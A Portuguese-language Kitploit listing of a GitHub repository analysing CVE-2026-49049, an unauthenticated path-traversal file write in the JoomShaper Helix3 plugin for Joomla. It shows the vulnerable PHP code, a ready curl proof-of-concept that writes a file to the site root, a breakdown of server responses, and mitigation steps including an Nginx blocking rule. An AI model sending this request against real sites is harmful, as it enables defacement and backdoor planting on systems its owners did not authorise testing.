Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-49049 — Análise técnica e Prova de Conceito (PoC) para CVE-2026-49049, uma vulnerabilidade de gravação arbitrária de arquivos sem autenticação no JoomShaper Helix3 para Joomla, incluindo vetores de exploração e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/dr-d25/cve-2026-49049
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubdr-d25/cve-2026-49049

CVE-2026-49049

Análise técnica e Prova de Conceito (PoC) para CVE-2026-49049, uma vulnerabilidade de gravação arbitrária de arquivos sem autenticação no JoomShaper Helix3 para Joomla, incluindo vetores de exploração e orientações de mitigação.

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Pesquisa da vulnerabilidade CVE-2026-49049: Gravação Arbitrária de Arquivo Não Autenticada no JoomShaper Helix3 (Joomla)

O repositório contém materiais, análise técnica e Prova de Conceito (PoC) para a vulnerabilidade crítica CVE-2026-49049, encontrada no obsoleto framework de templates Helix3 da JoomShaper para CMS Joomla (versões 1.0 a 3.1.0 inclusive).

A vulnerabilidade está ativamente sendo explorada na natureza por botnets automatizados (em particular, como parte da campanha de desfiguração AntonKill).


🔬 Análise Técnica da Vulnerabilidade

O problema está no manipulador AJAX do sistema Joomla (com_ajax), que chama o método onAjaxHelix3() no plugin plg_ajax_helix3. Os desenvolvedores do componente não previram:

  1. Verificação de autenticação do usuário (Authentication Bypass).
  2. Verificação de tokens CSRF.
  3. Filtragem de caminhos (Path Traversal Validation) ao processar o parâmetro layoutName.

Lógica do código PHP vulnerável:

root@kitploit:~
public function onAjaxHelix3() {
    \$input = Factory::getApplication()->input;
    \(data  =\)input->post->get('data', [], 'array');
    \(action =\)data['action'];
    \(layoutName =\)data['layoutName'];

    // Falta verificação de permissões! Falta filtragem de caminho!
    \$filepath = \(layoutPath .\)layoutName; 

    switch (\$action) {
        case 'save':
            // Grava dados controlados em um diretório arbitrário do servidor
            fwrite(fopen(\(filepath . '.json', 'wb'),\)data['content']);
            break;
    }
}

🛠 Prova de Conceito (PoC)

Para verificar a vulnerabilidade, utiliza-se uma requisição POST com tipo de conteúdo application/x-www-form-urlencoded. Este método de empacotamento de parâmetros é o mais eficaz para demonstrar a falha.

Vetor de ataque (comando cURL):

root@kitploit:~
curl -sk -X POST \
  'https://target.com' \
  -d 'data[action]=save&data[layoutName]=../../../../../../../example&data[content]={"probe":"test"}'

Análise detalhada dos dados transmitidos:

ParâmetroValor / ExemploO que significa para o servidor
optioncom_ajaxPonto de entrada no Joomla para processar requisições AJAX.
pluginhelix3Identificador do sistema que faz o Joomla passar o controle para o plugin vulnerável Helix3.
formatjsonIndica ao mecanismo para retornar resposta em formato JSON.
-ddata[...]Corpo da requisição (Form Data), automaticamente interpretado pelo PHP no array global $_POST.
data[action]saveInterruptor switch no código. Instrui o plugin a chamar a função de gravação (criação) de arquivo.
data[layoutName]../../../../../../../exampleVetor de ataque chave (Path Traversal). Os caracteres ../ fazem o sistema operacional sair da pasta isolada do plugin para o diretório raiz do site. A extensão .json será adicionada automaticamente pelo plugin.
data[content]{"probe":"test"}Carga útil (Payload). Dados de texto que serão fisicamente gravados dentro do arquivo criado example.json. Em ataques reais, código malicioso de desfiguração ou backdoors são injetados aqui.

🎯 Análise das Respostas do Servidor (Empresas de Validação)

Ao realizar testes de penetração, o servidor pode retornar diferentes tipos de respostas. Sua interpretação é criticamente importante:

Opção A: Vulnerabilidade funcionou com sucesso (Arquivo gravado)

Resposta do servidor:

root@kitploit:~
{"success":true,"message":null,"messages":null,"data":[]}

Interpretação: O plugin está vulnerável, não há restrições do SO. O arquivo foi criado com sucesso na raiz do site e está acessível em https://target.com. O site requer limpeza e isolamento imediatos.

Opção B: Plugin vulnerável, mas a proteção do sistema operacional foi acionada

Resposta do servidor:

root@kitploit:~
{
  "success":false,
  "message":"fwrite(): Argument #1 (\$stream) must be of type resource, bool given",
  "messages":null,
  "data":null
}

Interpretação: Sucesso parcial. A lógica do plugin Helix3 foi violada — ele aceitou dados sem autenticação e tentou abrir o arquivo para gravação (fopen). No entanto, o sistema operacional Linux bloqueou esta ação, pois o usuário do servidor web (por exemplo, www-data) não tem permissões de gravação na raiz do site.

Opção C: Sistema protegido (Atualizado ou removido)

Resposta do servidor: Status 404 Not Found, 403 Forbidden ou resposta vazia []. Interpretação: O plugin foi atualizado para a versão segura (3.1.1+), onde a verificação de autenticação foi adicionada, ou foi completamente removido do CMS.


🛡 Mitigação e Eliminação da Ameaça

  1. Atualização / Remoção: Atualize o Helix3 para a versão 3.1.1 ou superior. Se o framework não for utilizado, remova completamente o plugin plg_ajax_helix3 através do painel de administração do Joomla.
  2. Proteção no nível WAF (Nginx): Adicione uma regra para bloquear requisições POST maliciosas:
    root@kitploit:~
    if (\(request_method = POST) { set\)test "P"; }
    if (\$arg_plugin = "helix3") { set \(test "\){test}H"; }
    if (\$test = PH) { return 403; }
    

Aviso: Este material é fornecido exclusivamente para fins educacionais e para auditoria legítima de segurança de sistemas (Pentesting). O autor não se responsabiliza pelo uso indevido das informações fornecidas.

Baixar ferramenta